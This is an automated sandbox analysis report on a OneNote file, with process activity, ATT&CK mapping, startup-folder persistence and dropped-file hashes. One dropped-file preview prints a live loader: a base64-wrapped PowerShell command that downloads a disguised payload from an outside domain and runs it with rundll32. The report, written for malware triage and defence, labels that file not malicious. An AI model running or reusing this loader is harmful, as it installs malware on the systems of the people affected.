Edit tour

Windows Analysis Report
Notes.one

Overview

General Information

Sample Name:	Notes.one
Analysis ID:	800704
MD5:	11066dd27f54df0d6946c2cce1e92c54
SHA1:	ea61d3122e2c9fc7ebd70f7adb70d1354c01373a
SHA256:	3121e24a33897d265264476556555ad9cda4f81fb988e6f87545053a1f7b2a18
Infos:

Detection

Score:	21
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (process start blacklist hit)

Stores files to the Windows start menu directory

Creates a start menu entry (Start Menu\Programs\Startup)

Classification

Process Tree

System is w10x64_ra

ONENOTE.EXE (PID: 6232 cmdline: C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Notes.one MD5: 40B3448599978A2E151089DB8E6527C7)

ONENOTEM.EXE (PID: 6652 cmdline: /tsr MD5: A9E0C0B66CC33223550D66E7A0B15FC9)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE

Process created: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE

File created: C:\Users\user\AppData\Local\Temp\{A0713DF5-5558-41A1-9AEB-6340AF3A58F1} - OProcSessId.dat

Jump to behavior

Source: classification engine

Classification label: sus21.expl.winONE@3/234@0/0

Source: unknown	Process created: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Notes.one
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process created: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE /tsr
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process created: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE /tsr	Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE

File read: C:\Program Files\desktop.ini

Jump to behavior

Source: Send to OneNote.lnk.7.dr

LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE

Mutant created: \Sessions\1\BaseNamedObjects\OneNoteM:AppShared

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE

File created: C:\Users\user\Documents\{FD5E9A73-82DD-4425-951D-17F5121F0485}

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE

Process information queried: ProcessInformation

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Exploitation for Client Execution	2 Registry Run Keys / Startup Folder	1 Process Injection	1 Masquerading	OS Credential Dumping	1 Process Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Data Obfuscation	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	2 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	1 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	800704
Start date and time:	2023-02-07 18:26:39 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	Notes.one
Detection:	SUS
Classification:	sus21.expl.winONE@3/234@0/0
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .one

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, usocoreworker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 40.126.32.134, 40.126.32.72, 40.126.32.138, 40.126.32.140, 40.126.32.136, 20.190.160.17, 20.190.160.22, 20.190.160.20, 52.113.194.132, 52.109.13.64
Excluded domains from analysis (whitelisted): ecs.office.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, www.tm.a.prd.aadg.akadns.net, s-0005-office.config.skype.com, login.msa.msidentity.com, prod.nexusrules.live.com.akadns.net, ecs-office.s-0005.s-msedge.net, prda.aadg.msidentity.com, login.live.com, s-0005.s-msedge.net, ecs.office.trafficmanager.net, nexusrules.officeapps.live.com, www.tm.lg.prod.aadmsa.trafficmanager.net
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\onenote.exe_Rules.xml

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	XML 1.0 document, ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	212831
Entropy (8bit):	5.123296198911506
Encrypted:	false
SSDEEP:	768:H1G501T1fJFVHYwDQrpAElQKPV3pEbWcMd3o6O3Qgqbx+B+Vso7Rx0/USkHx3BNp:HcHr6KPPu2Xua
MD5:	5D1E1505BD5216805FC6CD14E0D90986
SHA1:	E7B0BC349EEA8222615174155407932A1E363DA0
SHA-256:	69588BD4887C59630856C985606BEC0096DF05563DADE1A896A79D1DA32B1354
SHA-512:	7DBDEFEA35977376A817304D04D51127940F5550E65AEF33FF40E631376CD08BF2CD8943E0404D1FF0B9AF3C9279848F53C126787DD99269F768659B9C00B6E2
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	<?xml version="1.0" encoding="utf-8"?><Rules xmlns="urn:Rules"><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU" xmlns=""><S><Etw T="1" E="159" G="{02fd33df-f746-4a10-93a0-2bc6273bc8e4}" /><F T="2"><O T="AND"><L><O T="NE"><L><S T="1" F="Warning" /></L><R><V V="37" T="U32" /></R></O></L><R><O T="NE"><L><S T="1" F="Warning" /></L><R><V V="29" T="U32" /></R></O></R></O></F><TI T="3" I="10min" /><A T="4" E="TelemetrySuspend" /><A T="5" E="TelemetryShutdown" /></S><G I="true" R="TriggerOldest"><S T="2"><F N="RuleID" /><F N="RuleVersion" /><F N="Warning" /><F N="Info" /></S></G><C T="U32" I="0" O="false" N="ErrorCount"><C><S T="2" /></C></C><C T="U32" I="1" O="false" N="ErrorRuleId"><S T="2" F="RuleID" /></C><C T="U16" I="2" O="false" N="ErrorRuleVersion"><S T="2" F="RuleVersion" /></C><C T="U8" I="3" O="false" N="WarningInfo"><S T="2"

C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	SQLite 3.x database, last written using SQLite version 3023002, writer version 2, read version 2, file counter 2, database pages 1, cookie 0, schema 0, largest root page 1, unknown 0 encoding, version-valid-for 2
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.09216609452072291
Encrypted:	false
SSDEEP:	3:lSWFN3l/klslpF/4llfll:l9F8E0/
MD5:	F138A66469C10D5761C6CBB36F2163C3
SHA1:	EEA136206474280549586923B7A4A3C6D5DB1E25
SHA-256:	C712D6C7A60F170A0C6C5EC768D962C58B1F59A2D417E98C7C528A037C427AB6
SHA-512:	9D25F943B6137DD2981EE75D57BAF3A9E0EE27EEA2DF19591D580F02EC8520D837B8E419A8B1EB7197614A3C6D8793C56EBC848C38295ADA23C31273DAA302D9
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......................................................................... .....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db-journal

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	4616
Entropy (8bit):	0.13760166725504608
Encrypted:	false
SSDEEP:	3:7FEG2l+thxlH/FllkpMRgSWbNFl/sl+ltlslVlllfllvMn:7+/lovg9bNFlEs1EP/kn
MD5:	940F18009E1484652E6DF918616AFAAB
SHA1:	245999E41A21A07349F0A97AC78D29EDA0D81E0A
SHA-256:	8984F37FFD16987278BB19E031B66AB9D74EEA31806997EA0F6B7834E83C12A4
SHA-512:	D28E5DBDF17E15702E17114E73B598C6732A70ABDD36F5945F8331070B79833209BB00F918B38A2ED3C09AA7639DA77C0C22D1AD0C3B147EB0ABC7C465CDBA70
Malicious:	false
Reputation:	low
Preview:	.... .c.......F.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ .......................................................................... .................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db-shm

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.04495055541749482
Encrypted:	false
SSDEEP:	3:G4l2caYrdUvlbl2caYrdUvlilL9//Xlvlll1lllwlvlllglbXdbllAlldl+l:G4l2cHCJl2cHCQL9XXPH4l942U
MD5:	9EEEB22F4DE1EA677F66F7D2A62591DA
SHA1:	47D26660F107B8A961C75113FE759F7862BA9612
SHA-256:	6BE9E2FABA548E484709DA7E8E2EF9090EE9878D9ABD211710EAFCE3396A0B80
SHA-512:	5C5CEDEF36421EB3B62877129E9B29CB479160546D90E51E2BCA954EC5ED9F966B6E65686EB00C696C517C37775F5B16AD8BE56BC5992FD866FF04864653BF08
Malicious:	false
Reputation:	low
Preview:	..-.......................?..Q.8...]f;o....A.'...-.......................?..Q.8...]f;o....A.'.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db-wal

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	dropped
Size (bytes):	45352
Entropy (8bit):	0.39445521010172707
Encrypted:	false
SSDEEP:	24:KaDl/JQ3zRDaD4F8Ull7DBtDi4kZERDIzqt8VtbDBtDi4kZERD3y:Nl/JQ1GD4F8Ull7DYMkzO8VFDYMb
MD5:	1145B898D2F9F319A26443FA70D906DB
SHA1:	5690F4BF4726557BE318C09131C7D1C3248324C4
SHA-256:	E3872AA562491578ADFB9C3A7126FC659F4551DDA9A73E1F8CC13E8652DE771F
SHA-512:	0B574992E10F62DF82D59BC44078C524FDD897D27012D752E3F7A5D1936C5A9528B6EC1F5B0876D629AEB05648E71060BD57183A97FA348C1322D8332394C563
Malicious:	false
Preview:	7....-.............]f;o2....3.............]f;o.i..N..<SQLite format 3......@ .......................................................................... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\header

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	2.6158045319402508
Encrypted:	false
SSDEEP:	3:+S2aRaRsl/lDP/l5nSARatl:+7a8RsltqSaX
MD5:	744D69BB3106BBEDC77C3583A855FFB2
SHA1:	FE7DD141CDB68DB02C57893EFC0FF7CF7A62CC53
SHA-256:	6085842E26D0693DEB6B2F062070D4985077CD96AF73F95ABAA84626F991C21F
SHA-512:	6D575A53D6FCED932D1B4FA6B1F6F6DA9D4582EBEF3A210F14000ECD4E94E2DCA9B1F85534FAE5710DAD4ED0B772B409D4485608CA7FAEFB8A302ECF5540C135
Malicious:	false
Preview:	.....f.<........................................p4.....@.&..X...........

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000007.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1354
Entropy (8bit):	7.799120546917745
Encrypted:	false
SSDEEP:	24:AXFMpSCdmi2MTbWm/8T368Bf50D+1vDD9BFGBsQ5SOryjJ4w6++mPKc82UGOpIUg:AO4m122bQ36gfaS1rDw2QsOryjJ4xLml
MD5:	C2BF462C1311A92660999498F29394BD
SHA1:	4BD7C156F172C1114F33D80BAB05252C9F8E87C0
SHA-256:	5E0A8F7D863DAD057AC91FB888CFA7BE1D30A6CF65A908CE90081C323A0858B7
SHA-512:	1107117B3C4B843E5EB32CB13C5CA91E28857DDAE18A197F471D9FCA5B767C7441661FC3A21D2B6FF3C6EB91048A93598E1D86EA55A60A427D8E4B82E59A30C9
Malicious:	false
Preview:	.PNG........IHDR...(...(........m....sRGB.........pHYs...t...t..f.x....IDATXG..O.W....`...c.C..`.H(!@.[Q..B.D......Q..}.C...}.CTU.MR.j...[.....".x.B.x.wG.2$xf.J..W..g....}w.H.....b* ...../.V_\|.....TC]-.d......\\Z..l......>..D....G.....}.]}.x...X...WZ....?.-..A..&x...Q$)U..../.w...?..!8IE..:.....6..y.z..Yg.`g.@(...z...VS..$@..q2.,."....RT.}..%..q.lA0....[m.................2...8..a.LJ....n......M.%x......\...$g.Y.p.Q^U....$;.r.....>...>...]..$...r..bz.P.(....}:&'ldc...c\|.bs.>z.:?.M....(.SR..a..o..=2....i#..{......y.)....}.1_ .....T@O..F..d....Piu.TQA....#DY.S&G....j....3z..>zL..:...33...C&.S....h...LQk. ...hRSy&m..?...d.....l.].G...BL.-..N;.....s.0Q....T.(0...p....HU..d.V..z.)..2. ..........d...x.{......2.zdP.....;.?aeu......(..,#.....nj.... ....0.X..dr.T)x...4.V...]p8].p.PH.4f{.n.....x.........Z...O>DF.)^.Y.....p.Zf..1e.a.>."fm{.=hui...Fnn.T......./''...U<.,f'........:Y......ckk..RN.....f.omf..rZi.\..h.....\|.4.,/......=.z%.F....Z...>..A.....?.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000008.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	76485
Entropy (8bit):	7.79809544163696
Encrypted:	false
SSDEEP:	1536:xvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7s:xgS2EJbyYeMYkKkyX3DWvLLATiY
MD5:	734BA03175EBC8B8E3EF57BC3DDC9D8E
SHA1:	1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918
SHA-256:	275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
SHA-512:	23EA232051472C3F4F61D81012F989BA54B24180C1353C860BCBBD92C89D2F395BF02786902AA9E0BFF634043A5C5E73CDB743124A8B5ECFBD0D583F28BB0B9F
Malicious:	false
Preview:	.PNG........IHDR.............v......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly\|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D...A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000009.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	GIF image data, version 89a, 1012 x 327
Category:	dropped
Size (bytes):	11765
Entropy (8bit):	7.911655818336033
Encrypted:	false
SSDEEP:	192:aUpmR1MS7mEuHIgBEoe/nOdV8EHi+rBJZ2M6qhH03NMWjvD5ZktcatNy+AT3jCOj:aUOVTi9EoDH8ujBJwMvhU3mgocatgdOm
MD5:	B035F23C68CC9673E604FE5472F223D2
SHA1:	56495B558547AACCE34C65C1D1FCF6C9ECAFCEE1
SHA-256:	F3F791A1303058D4F363E02F0515DE8484249624857CAF5ECE6C926D7324114C
SHA-512:	B6923EC5D91F5C771B65C63A97AB23BC8E6762CA60C31DEE8D1D141703923EDDFC266229B263EA88E10AF89A92C0EF361BF91A3D5CB600AE129C452D94580662
Malicious:	false
Preview:	GIF89a..G.................................................................................................................................................................\|.................................................................................................Y..Z..\.._..a..c..d..f..e..i..k..m..n..p..s..r..v..y..z..}..~....................0..3..5..6..7..9..<..>..@..B..C..E..G..J..N..N..P..R..T..V..[.................................................. ..!..#..#.."..$..&..&..(..)..+..+..,..,.....1..3..4..6..9..;..=..?..B..E..G..I..L..N..O..Q..S..W..Z..]..^..`..a..b..d..g..h..j..m..p..s..u..x..{..\|..~.................................................................................................................................................!.......,......G........H......\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.]...P.J.J...X.j....`..K...h.]...p..K...x..........L....N....8q..i.L....3k.....C..M....S.^....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000A.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	ASCII text, with very long lines (380), with no line terminators
Category:	dropped
Size (bytes):	380
Entropy (8bit):	5.853345406863477
Encrypted:	false
SSDEEP:	6:sKHLgyKBM34HR1KCsu2xKthIYWNgvBSP8A/lKaHoyCRjpm+Rs3FEY9hMS/aXXrZQ:ssLgyaI4HPKC2EwgvBSU6Ij4+RIFE4qg
MD5:	4B1934D97AE633B5C88F3424B4953761
SHA1:	9EADA74C008237311CBA7367A69A9D291ACE70F2
SHA-256:	74B3A5F20FDB37F8F26025E768EDDDCC08568542402033955C97AF6D8E5D61B4
SHA-512:	04980D507ACC647FA732429DCBB71632FB0F410523E56E39C32F0B89ECA342967DFFC4316B97D0881ABC0C1E7AC2D1A8AAC39B33D00EE0763076A1B65FD2FB99
Malicious:	false
Preview:	powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3N0YXJjb21wdXRhZG9yYXMuY29tL2x0MmVMTTYvMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg==')) > C:\ProgramData\in.cmd&&start /min C:\ProgramData\in.cmd

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000C.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	76485
Entropy (8bit):	7.79809544163696
Encrypted:	false
SSDEEP:	1536:xvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7s:xgS2EJbyYeMYkKkyX3DWvLLATiY
MD5:	734BA03175EBC8B8E3EF57BC3DDC9D8E
SHA1:	1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918
SHA-256:	275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
SHA-512:	23EA232051472C3F4F61D81012F989BA54B24180C1353C860BCBBD92C89D2F395BF02786902AA9E0BFF634043A5C5E73CDB743124A8B5ECFBD0D583F28BB0B9F
Malicious:	false
